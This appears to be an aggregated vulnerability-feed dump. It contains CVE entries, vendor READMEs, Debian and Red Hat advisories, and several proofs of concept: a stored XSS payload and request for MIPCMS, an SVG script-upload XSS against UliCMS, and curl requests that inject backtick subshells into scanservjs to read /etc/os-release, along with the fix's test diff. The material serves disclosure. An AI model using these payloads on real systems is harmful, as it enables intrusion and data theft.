Cross Site Scripting (XSS) vulnerability in MIPCMS 3.6.0 allows attackers to execute arbitrary code via the category name field to categoryEdit.

1.After the administrator logged in, open the following page:  
  
http://127.0.0.1/?s=/admin/article/articleCategory/  
  
2.click 'modify'  
3.fill payload in Category Name :  
  
"><imG/src=1 onerror=alert(1)>  
  
4.save  
5.The request package :  
  
POST /?s=/article/ApiAdminArticle/categoryEdit HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0  
Accept: application/json, text/plain, _/_  
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  
Referer: http://127.0.0.1/?s=/admin/article/articleCategory/  
Content-Type: application/json;charset=utf-8  
access-key: cFaLOmUGoz9URROtxaAqe37vHSlI0LL3  
terminal: pc  
uid: 9afb4393b6cddbeb7418ab77  
access-token: 06cdb3c844508158ebb7483c221c9e63  
Content-Length: 324  
Cookie: security_level=0; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1549460630; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1553359007; lang_type=zh-CN; bdshare_firstime=1549546719595; wp-settings-time-1=1551345212; PHPSESSID=65unerfghovped0ap7eokcrdi3; admin_id=1; admin_level=1; admin_name=admin; admin_secret=8b99f316efb80526f2434ded92036bff; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1553359007  
DNT: 1  
Connection: close

{"id":1,"pid":0,"name":""><imG/src=1 onerror=alert(1)>","url_name":"123","seo_title":"","template":"article.html","detail_template":"articleDetail.html","category_url":"/article/<url_name>/","category_page_url":"<category_url>index_.html","detail_url":"/article/.html","description":"","keywords":"","content":""}  

6.open the url it will trigger:  
  
http://127.0.0.1/index.php?s=/article/123/

CVE-2020-18132: There is a Store XSS in Administrator Pannel · Issue #4 · sansanyun/mipcms

File upload vulnerability in MCMS 5.0 allows attackers to execute arbitrary code via a crafted thumbnail. A different vulnerability than CVE-2022-31943.

**价值源自分享**

    

铭飞平台 后台演示 前台演示 在线使用手册 腾讯课堂在线视频  
代码生成器视频教程  
Windows一键运行版本\\Linux一键运行版本 Docker体验

一直在改变，从未停止过！  
QQ交流群号：     

**开源说明**

*   系统100%开源
*   模块化开发模式，铭飞所开发的模块都发布到了maven中央库。 可以通过pom.xml文件的方式拉取源代码

    <dependency>
    	<groupId>net.mingsoft</groupId>
    	<artifactId>模块</artifactId>
    	<version>版本号</version>
    	<classifier>sources</classifier>
    	<scope>provided</scope>
    </dependency>
    

**商用**

基于MIT开源协议，可直接商用无需授权，但请尊重开源精神不要去掉代码中铭飞的注释和版权信息

**特点**

*   免费完整开源：基于MIT协议，源代码完全开源，无商业限制,MS开发团队承诺将MCMS内容系统永久完整开源；  
    
*   标签化建站：不需要专业的后台开发技能，只要使用系统提供的标签，就能轻松建设网站；  
    
*   html静态化：系统支持全站静态化；  
    
*   跨终端：站点同时支持PC与移动端访问，同时会自动根据访问的终端切换到对应的界面，数据由系统统一管理；  
    
*   海量模版：铭飞通过MStore（MS商城）分享更多免费、精美的企业网站模版，降低建站成本；  
    
*   丰富插件：为了让MCms适应更多的业务场景，在MStore用户可以下载对应的插件，如：站群插件、微信插件、商城插件等；  
    
*   每月更新：铭飞团队承诺每月28日为系统升级日，分享更多好用等模版与插件；  
    
*   文档丰富：为了让用户更快速的使用MCms系统进行开发，铭飞团队持续更新开发相关文档，如标签文档、使用文档、视频教程等；  
    

**面向对象**

*   企 业：帮助创立初期的公司或团队快速搭建产品的技术平台，加快公司项目开发进度；
*   开发者：帮助开发者快速完成承接外包的项目，避免从零搭建系统；
*   学习者：初学JAVA的同学可以下载源代码来进行学习交流；

**开发环境**

建议开发者使用以下环境，这样避免版本带来的问题

*   Windows、Linux
*   Eclipse、Idea
*   Mysql≧5.7 (开启忽略大小写)
*   JDK≧8
*   Tomcat≧8

**快速体验（导入到 Eclipse 或 IDEA）**

1、检出源代码： git clone https://gitee.com/mingSoft/MCMS.git  
2、导入项目  

*   Eclipse导入，菜单 File -> Import，然后选择 Maven -> Existing Maven Projects，点击 Next> 按钮，选择检出的项目MCMS文件夹，然后点击 Finish 按钮，即可成功导入
*   IDEA导入，点击 Import Project，选择 pom.xml 文件，点击 Next 按钮，选择 Import Maven projects automatically 复选框，然后一直点击 Next 按钮，直到点击 Finish 按钮，即可成功导入  
    

4、Eclipse（IDEA）会自动加载 Maven 依赖包，初次加载会比较慢（根据自身网络情况而定），若工程上有小叉号，请打开 Problems 窗口，查看具体错误内容，直到无错误为止  
5、创建数据库mcms（数据库使用utf-8编码），导入doc/mcms-版本号.sql，如果升级现有系统请使用＊-up-\*.sql升级，如果导入了系统对应的完整版SQL，sql升级补丁不需要重复导入；  
6、修改src\\main\\resources\\application-dev.yml文件中的数据库设置参数；  
7、运行MSApplication.java main方法  
8、首先先访问后台地址：http://localhost:8080/ms/login.do，管理员账号，用户名：msopen 密码：msopen，进入后台点击内容管理->静态化菜单，进行"生成主页"，"生成栏目","生成文章"操作一遍 （注意！！！是后台登录界面，不是会员中心登录界面）

**快速体验（docker）**

    docker run -p 3306:3306 -p 8080:8080 --name mcms --privileged=true -e TZ=Asia/Shanghai  \
    --restart=always -e MYSQL_ROOT_PASSWORD=123456 -d mingsoft/mcms \
    --sql-mode="STRICT_TRANS_TABLES,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION" \
    --lower-case-table-names=1 \
    --query-cache-type=1 \
    --query-cache-size=600000 \
    --max-connections=1000
    
    

MYSQL_ROOT_PASSWORD 数据库密码，如果修改需要修改容器 /home/mcms/config/ 下配置文件的链接，实际部署可以将 /home/mcms 挂载到外部文件夹，方便更新 mcms 系统文件

**技术选型****后端框架**

技术

名称

官网

Spring Framework

容器

http://projects.spring.io/spring-framework

Spring Boot

MVC

https://spring.io/projects/spring-boot

Apache Shiro

安全

http://shiro.apache.org

Spring session

分布式Session管理

http://projects.spring.io/spring-session

MyBatis

DAO

http://www.mybatis.org

MyBatis-Plus

ORM

https://baomidou.com/

Freemarker

视图

http://freemarker.foofun.cn

PageHelper

MyBatis分页插件

http://git.oschina.net/free/Mybatis\_PageHelper

Log4J

日志组件

http://logging.apache.org

Maven

项目构建

http://maven.apache.org

Elasticsearch

分布式搜索引擎

https://www.elastic.co

Redis

分布式缓存数据库

https://redis.io

hutool

工具类

http://hutool.mydoc.io

**前端框架**

技术

名称

官网

VUE

MVVM框架

https://cn.vuejs.org//

Element UI

UI库

https://element.eleme.cn/2.0/#/zh-CN

jQuery

函式库

http://jquery.com/

Waves

点击效果插件

https://github.com/fians/Waves/

validator

验证库

https://github.com/chriso/validator.js

animate

动画

http://daneden.github.io/animate.css/

icon

矢量小图标(待更新)

https://www.iconfont.cn/

**文件说明**

*   doc 项目文档文件夹，里面有数据库文件
*   src/main/java java源代码
*   src/main/resources 项目的资源配置文件
*   src/main/webapp
*   src/main/webapp/static 静态资源文件，如：js、css、image、等第三方前端插件库
*   src/main/webapp/html 生成的静态页面，实际项目需要删除，只是提供给开发者快速预览生成后的静态页面
*   src/main/webapp/templet 模版文件夹
*   src/main/webapp/upload 上传资源文件夹
*   src/main/webapp/WEB-INF/manager 后端视图页面
*   LICENSE 项目协议说明
*   README.md 项目说明文档
*   pom.xml 依赖配置文件

**文档**

*   使用手册 http://doc.mingsoft.net/mcms/
*   插件手册 http://doc.mingsoft.net/plugs/

**关于版本说明 更多版本查看**

1.  开源版本永久免费发布源代码，开发者、企业可以终身免费使用，每个月团队会收集开源系统的问题并在每月的28号进行更新；
2.  企业版本以上更新频率上更快，功能也比开源版本的要多，同时会根据不同版本提供额外插件，不同版本也会提供不同的人工在线服务（服务时间工作日 9:30-17:30）

**软件截图**

**铭飞平台**

以下功能都可以在平台 https://www.mingsoft.net 上免费使用 做开源我们是业余的，写代码我们是认真的。研发产品的路上我们一直在探索、一直在学习、一直在用心投入，希望能给更多的企业与开发者提供一些更有价值的服务。

**项目管理**

**代码生成器**

**模版插件分享**

价值源自分享，开发者可以再MStore安装分享插件进行分享模版（后续会升级到插件分享），让代码给开发者带来更多的被动收入！

CVE-2020-22755: GitHub - ming-soft/MCMS: 完整开源！Java快速开发平台！基于Spring、SpringMVC、Mybatis架构，MStore提供更多好用的插件与模板（文章、商城、微信、论坛、会员、评论、支付、积分、工作流、任务调度等，同时提供上百套免费模板任意选择），价值源自分享！铭飞系统不仅一套简单好用的开源系统、更是一整套优质的开源生态内容体系。铭飞的使命就是降低开发成本提高开发效

Metersphere v1.20.20-lts-79d354a6 is vulnerable to Remote Command Execution. The system command reverse-shell can be executed at the custom code snippet function of the metersphere system workbench

**一站式开源持续测试平台**

   

MeterSphere 是一站式开源持续测试平台, 涵盖测试跟踪、接口测试、UI 测试和性能测试等功能，全面兼容 JMeter、Selenium 等主流开源标准，有效助力开发和测试团队充分利用云弹性进行高度可扩展的自动化测试，加速高质量的软件交付，推动中国测试行业整体效率的提升。

**MeterSphere 的功能**

*   **测试跟踪**: 对接主流项目管理平台，测试过程全链路跟踪管理；列表脑图模式自由切换，用例编写更简单、测试报告更清晰；
*   **接口测试**: 比 JMeter 易用，比 Postman 强大； API 管理、Mock 服务、场景编排、多协议支持，你想要的全都有；
*   **UI 测试**: 基于 Selenium 浏览器自动化，高度可复用的测试脚本； 无需复杂的代码编写，人人都可开展的低代码自动化测试；
*   **性能测试**: 兼容 JMeter 的同时补足其分布式、监控与报告以及管理短板; 轻松帮助团队实现高并发、分布式的性能压测，完成压测任务的统一调度与管理。

**MeterSphere 的优势**

*   **开源**：基于开源、兼容开源；按月发布新版本、日均下载安装超过100次、被大量客户验证；
*   **一站式**：一个产品全面涵盖测试跟踪、接口测试、UI测试、性能测试等功能并形成联动；
*   **全生命周期**：一个产品全满足从测试计划、测试执行到测试报告分析的全生命周期需求；
*   **持续测试**：无缝对接 Bug 管理工具和持续集成工具等，能将测试融入持续交付和 DevOps 体系；
*   **团队协作**：支持团队协作和资产沉淀，无论团队规模如何，总有适合的落地方式。

**UI 展示**

**快速开始**

**一键安装**

仅需两步快速安装 MeterSphere：

1.  准备一台不小于 8 G内存的 64位 Linux 主机；
2.  以 root 用户执行如下命令一键安装 MeterSphere。

curl -sSL https://resource.fit2cloud.com/metersphere/metersphere/releases/latest/download/quick\_start.sh | bash

**学习资料**

*   在线文档
*   社区论坛
*   在线体验

**加入微信交流群**

**版本说明**

MeterSphere 版本号命名规则为：v大版本.功能版本.Bug修复版本。比如：

    v1.0.1 是 v1.0.0 之后的Bug修复版本；
    v1.1.0 是 v1.0.0 之后的功能版本。
    

像其它优秀开源项目一样，MeterSphere 将按月发布功能版本、按年度发布 LTS（Long Term Support）版本。

MeterSphere 的最新 LTS 版本为 v1.20 LTS。MeterSphere 下一个 LTS 版本为 v2.10 LTS，预计在 2023 年第二季度发布。

**技术栈**

*   后端: Spring Boot
*   前端: Vue.js
*   中间件: MySQL, Kafka, MinIO
*   基础设施: Docker, Kubernetes
*   测试引擎: JMeter

**安全说明**

如果您在使用过程中发现任何安全问题，请通过以下方式直接联系我们：

*   邮箱：support@fit2cloud.com
*   电话：400-052-0755

**致谢**

*   BlazeMeter：感谢 BlazeMeter 提供的设计思路
*   JMeter：MeterSphere 使用了 JMeter 作为测试引擎
*   Element：感谢 Element 提供的优秀组件库

**License & Copyright**

Copyright (c) 2014-2023 飞致云 FIT2CLOUD, All rights reserved.

Licensed under The GNU General Public License version 3 (GPLv3) (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at

https://www.gnu.org/licenses/gpl-3.0.html

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.

CVE-2023-29944: GitHub - metersphere/metersphere: MeterSphere 是一站式开源持续测试平台，覆盖测试管理、接口测试、UI 测试和性能测试等。搞测试，就选 MeterSphere！

OS Command Injection in GitHub repository sbs20/scanservjs prior to v2.27.0.



**Description**

Scanservjs has a RESTful API that provides endpoints for interacting with scanners using the SANE library. There are two APIs for scanning an image and generating a preview image that call out to Process.spawn, invoking a scanimage command as a subprocess of the server, and passing arguments from the API request body as arguments into the subprocess. Both APIs suffer from OS Command Injection via type confusion in several parameters in the POST body. While the business logic does sanitize string parameters from these API calls, it doesn't sufficiently prevent arrays of strings from being passed in several vulnerable POST body parameters. This allows an attacker to pass a JSON array with a single string parameter, buffeted by backticks, which gets formatted as a string and placed in the arguments for scanimage. This ultimately executes a subshell with an arbitrary command passed by the attacker, leading to remote code execution. While scanservjs has the option to enable HTTP Basic Auth, it is hidden in the config and there is no documentation on this feature, therefore this is a remote code execution without authentication by default.

**Proof of Concept****POST /scan Proof of Concept**

Request:

    curl --request POST \
      --url http://localhost:8080/scan \
      --header 'Content-Type: application/json' \
      --data '{"version":"2.26.1","params":{"deviceId":"pixma:MP620_10.64.0.25","resolution":["`cat /etc/os-release 1>&2`"],"width":216,"height":297,"left":0,"top":0,"mode":"Color","source":"Flatbed"},"filters":[],"pipeline":"JPG | @:pipeline.high-quality","batch":"none","index":1}'
    

Response:

    {
        "message": "/usr/bin/scanimage -d pixma:MP620_10.64.0.25 --source Flatbed --mode Color --resolution `cat /etc/os-release 1>&2` -l 0 -t 0 -x 216 -y 297 --format tiff -o data/temp/~tmp-scan-0-0001.tif exited with code: 1, stderr: PRETTY_NAME=\"Ubuntu 22.10\"\nNAME=\"Ubuntu\"\nVERSION_ID=\"22.10\"\nVERSION=\"22.10 (Kinetic Kudu)\"\nVERSION_CODENAME=kinetic\nID=ubuntu\nID_LIKE=debian\nHOME_URL=\"https://www.ubuntu.com/\"\nSUPPORT_URL=\"https://help.ubuntu.com/\"\nBUG_REPORT_URL=\"https://bugs.launchpad.net/ubuntu/\"\nPRIVACY_POLICY_URL=\"https://www.ubuntu.com/legal/terms-and-policies/privacy-policy\"\nUBUNTU_CODENAME=kinetic\nLOGO=ubuntu-logo\nscanimage: open of device pixma:MP620_10.64.0.25 failed: Invalid argument\n",
        "code": -1
    }
    

**Proof of Concept****POST /preview Proof of Concept**

Request:

    curl --request POST \
      --url http://localhost:8080/preview \
      --header 'Content-Type: application/json' \
      --data '{"version":"2.26.1","params":{"deviceId":"pixma:MP620_10.64.0.25","resolution":100,"width":216,"height":297,"left":0,"top":0,"mode":"Color","source":"Flatbed", "contrast": ["`cat /etc/os-release 1>&2`"]},"filters":[],"pipeline":"JPG | @:pipeline.high-quality","batch":"none","index":1}'
    

Response:

    {
        "message": "/usr/bin/scanimage -d pixma:MP620_10.64.0.25 --source Flatbed --mode Color --resolution 100 -l 0 -t 0 -x 216 -y 297 --format tiff --contrast `cat /etc/os-release 1>&2` -o data/preview/preview.tif exited with code: 1, stderr: PRETTY_NAME=\"Ubuntu 22.10\"\nNAME=\"Ubuntu\"\nVERSION_ID=\"22.10\"\nVERSION=\"22.10 (Kinetic Kudu)\"\nVERSION_CODENAME=kinetic\nID=ubuntu\nID_LIKE=debian\nHOME_URL=\"https://www.ubuntu.com/\"\nSUPPORT_URL=\"https://help.ubuntu.com/\"\nBUG_REPORT_URL=\"https://bugs.launchpad.net/ubuntu/\"\nPRIVACY_POLICY_URL=\"https://www.ubuntu.com/legal/terms-and-policies/privacy-policy\"\nUBUNTU_CODENAME=kinetic\nLOGO=ubuntu-logo\nscanimage: open of device pixma:MP620_10.64.0.25 failed: Invalid argument\n",
        "code": -1
    }
    

**Impact**

The vulnerability can execute any process on the server using a subshell, so the compromise of the system running scanservjs is almost complete. This vulnerability enables an attacker to dump the contents of any file on the server that the user, or the user's group, associated with the scanservjs process has permissions to read. Exfiltrating data can be done by using code execution in a subshell and redirecting output of a cat like command to stderr. An attacker can do more than query data using the subshell, and can run commands to write data to the server, and execute other processes outside the scope of scanservjs. In the default case, scanservjs is setup with a dedicated non root user so this user cannot read files, write files or execute commands as root. In the worst case, an administrator sets up scanservjs to run as a user with root permissions.

**Occurrences**

command-builder.js L18

The vulnerability occurs in the following code when the parameters passed from the API are formatted and sanitized. String parameters are sanitized and surrounded with single quotes but array type parameters, which can be passed to this function, are not sanitized or quoted. They are then formatted to a string when calling return `${value}`.

      /**
       * @param {string|number} [value]
       * @returns {string}
       */
      _format(value) {
        if (typeof value === 'string') {
          if (value.includes('\'')) {
            throw Error('Argument must not contain single quote "\'"');
          } else if (['$', ' ', '#', '\\', ';'].some(c => value.includes(c))) {
            return `'${value}'`;
          }
        }
        return `${value}`;
      }

CVE-2023-2564: OS Command Injection via Type Confusion in Scan and Preview Parameters in scanservjs

OS Command Injection in GitHub repository sbs20/scanservjs prior to v2.27.0.

Expand Up @@ -9,12 +9,36 @@ describe('CommandBuilder', () => { 'echo'); });  
it('command-arg', async () \=> { it('command-arg-number', async () \=> { assert.strictEqual( new CommandBuilder('echo').arg(1).build(), 'echo 1'); });  
it('command-arg-boolean', async () \=> { assert.strictEqual( new CommandBuilder('echo').arg(true).build(), 'echo true'); });  
it('command-arg-string-no-space', async () \=> { assert.strictEqual( new CommandBuilder('echo').arg('hello-world').build(), 'echo hello-world'); });  
it('command-arg-string-space', async () \=> { assert.strictEqual( new CommandBuilder('echo').arg('hello world').build(), 'echo \\'hello world\\''); });  
it('command-arg-string-tab-backtick', async () \=> { assert.strictEqual( new CommandBuilder('echo').arg('\`cat\\t/etc/os-release\\t1>&2\`').build(), 'echo \\'\`cat\\t/etc/os-release\\t1>&2\`\\''); });  
it('command-arg-hash', async () \=> { assert.strictEqual( new CommandBuilder('echo').arg('-n', 'hello#world').build(), Expand All @@ -27,6 +51,12 @@ describe('CommandBuilder', () => { 'echo -n \\'hello;world\\''); });  
it('command-arg-redirect', async () \=> { assert.strictEqual( new CommandBuilder('echo').arg('> thing').build(), 'echo \\'> thing\\''); });  
it('command-security-1', async () \=> { assert.strictEqual( new CommandBuilder('echo').arg('-n', 'hello" && ls -al;# world').build(), Expand All @@ -36,13 +66,48 @@ describe('CommandBuilder', () => { it('command-security-2', async () \=> { assert.throws( () \=> new CommandBuilder('echo').arg('-n', 'hello\\' && echo break shell').build(), Error, 'Broke shell'); /Error: Argument.\*single quote.\*/); });  
it('command-security-array', async () \=> { assert.throws( () \=> new CommandBuilder('echo').arg(\['\`cat /etc/os-release 1>&2\`'\]).build(), /Error: Invalid argument.\*object.\*/); });  
it('command-security-object', async () \=> { assert.throws( () \=> new CommandBuilder('echo').arg({arg: '\`cat /etc/os-release 1>&2\`'}).build(), /Error: Invalid argument.\*object.\*/); });  
it('command-quotes"', async () \=> { assert.strictEqual( new CommandBuilder('echo').arg('"1\\n2\\n3"').build(), 'echo "1\\n2\\n3"'); 'echo \\'"1\\n2\\n3"\\''); });  
it('command-redirect-good"', async () \=> { assert.strictEqual( new CommandBuilder('echo').arg('"hello"').redirect('>').arg('output').build(), 'echo \\'"hello"\\' > output'); });  
it('command-redirect-bad-string', async () \=> { assert.throws( () \=> new CommandBuilder('echo').redirect('a').build(), /Error: Invalid argument.\*/); });  
it('command-redirect-bad-number', async () \=> { assert.throws( () \=> new CommandBuilder('echo').redirect(1).build(), /Error: Invalid argument.\*/); });  
it('command-redirect-bad-array', async () \=> { assert.throws( () \=> new CommandBuilder('echo').redirect(\['invalid'\]).build(), /Error: Invalid argument.\*/); }); });

CVE-2023-2564: SECURITY: CommandBuilder fixes · sbs20/scanservjs@d51fd52

IBM QRadar Data Synchronization App 1.0 through 3.0.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.  IBM X-Force ID:  217370.

  

**Summary**

The product includes vulnerable components (e.g., framework libraries) that may be identified and exploited with automated tools. IBM QRadar Data Synchronization App for IBM QRadar SIEM has addressed the applicable CVEs.

**Vulnerability Details**

**CVEID:**   CVE-2022-22313  
**DESCRIPTION:**   IBM QRadar Data Synchronization App uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.  
CVSS Base score: 4.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/217370 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2021-44906  
**DESCRIPTION:**   Node.js Minimist module could allow a remote attacker to execute arbitrary code on the system, caused by a prototype pollution in setKey() function in the index.js script. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system.  
CVSS Base score: 5.6  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/222195 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L)

**CVEID:**   CVE-2020-7598  
**DESCRIPTION:**   minimist could provide weaker than expected security, caused by a prototype pollution flaw. By sending a specially crafted request, a remote attacker could exploit this vulnerability to add or modify properties of Object.prototype.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/177780 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM QRadar Data Synchronization App

1.0 - 3.0.1

  

**Remediation/Fixes**

IBM encourages customers to update their systems promptly.

Update to 3.1.0

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

03 Apr 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSBQAC","label":"IBM Security QRadar SIEM"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"3.0.1","Edition":"","Line of Business":{"code":"LOB24","label":"Security Software"}}\]

CVE-2022-22313: Security Bulletin: IBM QRadar Data Synchronization App for IBM QRadar SIEM is vulnerable to using components with known vulnerabilities

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between April 28 and May 5. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for April 28 to May 5

UliCMS version 2023-1 Sniffing-Vicuna suffers from a persistent cross site scripting vulnerability.

    #Exploit Title: Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)#Application: Ulicms#Version: 2023.1-sniffing-vicuna#Bugs:  Stored Xss#Technology: PHP#Vendor URL: https://en.ulicms.de/#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip#Date of found: 04-05-2023#Author: Mirabbas Ağalarov#Tested on: Linux 2. Technical Details & POC========================================steps: 1. Go to media then to file (http://localhost/dist/admin/index.php?action=files)2. upload malicious svg filesvg file content ===><?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>poc request:POST /dist/admin/fm/upload.php HTTP/1.1Host: localhostContent-Length: 663sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryK3CvcSs8xZwzABClX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36sec-ch-ua-platform: "Linux"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/dist/admin/fm/dialog.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: last_position=%2F; 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delvConnection: close------WebKitFormBoundaryK3CvcSs8xZwzABClContent-Disposition: form-data; name="fldr"------WebKitFormBoundaryK3CvcSs8xZwzABClContent-Disposition: form-data; name="files[]"; filename="SVG_XSS.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>------WebKitFormBoundaryK3CvcSs8xZwzABCl--3. Go to http://localhost/dist/content/SVG_XSS.svg

UliCMS 2023-1 Sniffing-Vicuna Cross Site Scripting

Debian Linux Security Advisory 5396-2 - The webkit2gtk update released as 5396-1 introduced a compatibility problem that caused Evolution to display e-mail incorrectly. Evolution has been updated to solve this issue.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5396-2                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
May 04, 2023                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : evolution  
Debian Bug     : 1035469

The webkit2gtk update released as 5396-1 introduced a compatibility  
problem that caused Evolution to display e-mail incorrectly. Evolution  
has been updated to solve this issue.

For the stable distribution (bullseye), this problem has been fixed in  
version 3.38.3-1+deb11u2.

We recommend that you upgrade your evolution packages.

For the detailed security status of evolution please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/evolution

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmRT6FEACgkQAAyEYu0C  
2ALibg/9FWGsSbwd8IEBJ71YIUsRj9arilW4oj2ur4W0mSIINlBuU+LZi+DyBC0r  
NJmSJWbJHyUBpdvNI6bSkSApUXj91oNuNUxZ4sdyGIHgqh/n8yHLOYdTIozA9Dg7  
6EmHBsy864csERzS5yQCD+MTr4d84tjXm9lb5AlZBW+BjrDPwd1GVqzdTKfLddGx  
pQxehkGsthn4B5pjuvrm0byoHtz8o5jhRlq1CEYOv3+nsvG1ea8CM3YXUH9uef2e  
zi4ib77KxI3GthP9l76/lRB+CRrWMjeqzt6zBPHVV7QJ20E+p8KW+rZqoDwoY9n+  
W3iPDbB/KZVh6/vXNoDBBjKs9HrxjTyvGFYvaNEt9qODAAnwQWtDQoA/nufiD+AY  
NlYqLkKuweXBpgoO+L9c9G+9PX+QLuI7ifi6s/v1iAF0jp+/aiS/PR2q+BPRcikd  
0q/Qg0dFdDUkb8snRJTBI44wSkq7jVBLNJ5CKFYjVbjP+bEtHQKtAw3YIC7mto2W  
VxTHIJLkJw1oiiMZqrg2s/tdVb5WwXRaIkW/1MpS3zLUVWKMOOgQCwqM1TzWulsP  
DJdaNHQW+V1POESkbHM6BY6XgXFGrltR/433h7TzVJSKVO2igDfocOL6JIa7hE7l  
x7MRT7aFA50Ao63lUEyHmK1Sz+qA8Ku0rO8g8URI8v0Djy1BCZI=  
=Az5K  
-----END PGP SIGNATURE-----

Debian Security Advisory 5396-2

Red Hat Security Advisory 2023-2126-01 - Libreswan is an implementation of IPsec and IKE for Linux. IPsec is the Internet Protocol Security and uses strong cryptography to provide both authentication and encryption services. These services allow you to build secure tunnels through untrusted networks such as virtual private network.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: libreswan security update  
Advisory ID:       RHSA-2023:2126-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:2126  
Issue date:        2023-05-04  
CVE Names:         CVE-2023-30570   
=====================================================================

1. Summary:

An update for libreswan is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - aarch64, ppc64le, s390x, x86_64

3. Description:

Libreswan is an implementation of IPsec and IKE for Linux. IPsec is the  
Internet Protocol Security and uses strong cryptography to provide both  
